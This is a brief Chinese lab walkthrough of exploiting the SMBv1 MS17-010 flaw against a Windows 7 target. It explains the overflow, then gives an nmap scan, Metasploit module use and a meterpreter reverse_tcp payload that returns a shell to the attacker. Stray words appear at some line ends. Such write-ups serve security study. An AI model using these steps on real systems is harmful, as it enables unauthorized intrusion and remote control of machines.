MS17-010远程溢出(CVE-2017-0143)
原理:MS17-010漏洞出如今Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而致使缓冲区溢出。linux
实验环境shell
功能 | 属性 |
---|---|
操做机 | kali linux |
IP | 192.168.0.3 |
靶机 | Windows7 SP1 |
IP | 192.168.0.2 |
1.端口探测
nmap -sV -Pn 192.168.0.2
目标机开放了135 139 445 3389等端口
2.漏洞扫描
在终端输入msfconsole开启msf 搜索ms17-010漏洞相关模块 使用use命令选择咱们要使用的扫描模块
能够看到目标主机存在ms17-010漏洞,开始使用漏洞利用模块windows
选择载荷payload,也就是shellcode,此处咱们选择回连至控制端shell的payload set payload windows/x64/meterpreter/reverse_tcp
设置本地主机
完成配置后,运行exploit或者run开始执行漏洞利用模块tcp
成功获取来自目标主机的Session会话函数